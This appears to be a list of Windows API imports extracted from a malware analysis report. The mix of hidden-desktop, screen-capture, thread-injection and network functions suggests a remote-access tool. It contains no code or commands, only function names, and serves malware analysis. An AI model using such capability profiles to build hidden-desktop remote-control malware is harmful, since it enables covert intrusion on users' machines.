  • kernel32.dll.OpenProcess
  • kernel32.dll.CreateThread
  • advapi32.dll.GetUserNameW
  • kernel32.dll.GetComputerNameW
  • kernel32.dll.GetVersionExA
  • kernel32.dll.CreateNamedPipeA
  • kernel32.dll.ConnectNamedPipe
  • kernel32.dll.DisconnectNamedPipe
  • wininet.dll.InternetCrackUrlA
  • kernel32.dll.GetTempPathA
  • kernel32.dll.GetTempFileNameA
  • shell32.dll.ShellExecuteA
  • ws2_32.dll.ioctlsocket
  • ws2_32.dll.ntohs
  • kernel32.dll.CreateMutexA
  • kernel32.dll.ReleaseMutex
  • ntdll.dll.NtCreateThreadEx
  • kernel32.dll.TerminateProcess
  • user32.dll.FindWindowA
  • user32.dll.GetWindowThreadProcessId
  • user32.dll.EnumWindows
  • kernel32.dll.GetCurrentProcessId
  • kernel32.dll.DeleteFileA
  • shlwapi.dll.PathFileExistsA
  • kernel32.dll.CreateDirectoryA
  • wininet.dll.HttpQueryInfoA
  • wininet.dll.HttpQueryInfoW
  • ntdll.dll.RtlCompressBuffer
  • ntdll.dll.RtlGetCompressionWorkSpaceSize
  • user32.dll.SetThreadDesktop
  • user32.dll.CreateDesktopA
  • user32.dll.OpenDesktopA
  • kernel32.dll.TerminateThread
  • user32.dll.SendMessageA
  • user32.dll.ChildWindowFromPoint
  • user32.dll.ScreenToClient
  • user32.dll.MoveWindow
  • user32.dll.GetWindowRect
  • user32.dll.GetMenuItemID
  • user32.dll.MenuItemFromPoint
  • user32.dll.RealGetWindowClassA
  • user32.dll.PtInRect
  • user32.dll.GetWindowPlacement
  • user32.dll.GetWindowLongA
  • user32.dll.SetWindowLongA
  • user32.dll.WindowFromPoint
  • shell32.dll.SHAppBarMessage
  • advapi32.dll.RegQueryValueExA
  • user32.dll.GetDesktopWindow
  • gdi32.dll.DeleteDC
  • user32.dll.ReleaseDC
  • gdi32.dll.DeleteObject
  • gdi32.dll.GetDIBits
  • gdi32.dll.StretchBlt
  • gdi32.dll.SetStretchBltMode
  • gdi32.dll.SelectObject
  • gdi32.dll.CreateCompatibleDC
  • gdi32.dll.CreateCompatibleBitmap
  • user32.dll.GetDC
  • user32.dll.IsWindowVisible
  • user32.dll.GetWindow
  • gdi32.dll.BitBlt
  • user32.dll.PrintWindow
  • user32.dll.GetTopWindow
  • ntdll.dll.NtQueryInformationProcess
  • shell32.dll.SHFileOperationA
  • kernel32.dll.FindFirstFileA
  • kernel32.dll.FindNextFileA
  • sechost.dll.LookupAccountNameLocalA
  • advapi32.dll.EventUnregister
  • kernel32.dll.SortGetHandle
  • kernel32.dll.SortCloseHandle
  • dnsapi.dll.DnsApiFree
  • ntdll.dll.RtlInitAnsiString
  • ntdll.dll.RtlAnsiStringToUnicodeString
  • ntdll.dll.LdrLoadDll
  • ntdll.dll.LdrGetProcedureAddress
  • ntdll.dll.RtlFreeUnicodeString
  • kernel32.dll.VirtualQuery
  • kernel32.dll.InterlockedExchange
  • kernel32.dll.InterlockedCompareExchange
  • kernel32.dll.FlushInstructionCache
  • kernel32.dll.HeapCreate
  • kernel32.dll.HeapDestroy
  • kernel32.dll.HeapAlloc
  • kernel32.dll.HeapReAlloc
  • kernel32.dll.HeapFree
  • kernel32.dll.GetCurrentProcess
  • kernel32.dll.GetCurrentThreadId
  • kernel32.dll.OpenThread
  • kernel32.dll.SuspendThread
  • kernel32.dll.GetModuleHandleW
  • kernel32.dll.Thread32First
  • kernel32.dll.Thread32Next
  • kernel32.dll.GetProcessHeap
  • kernel32.dll.OpenMutexA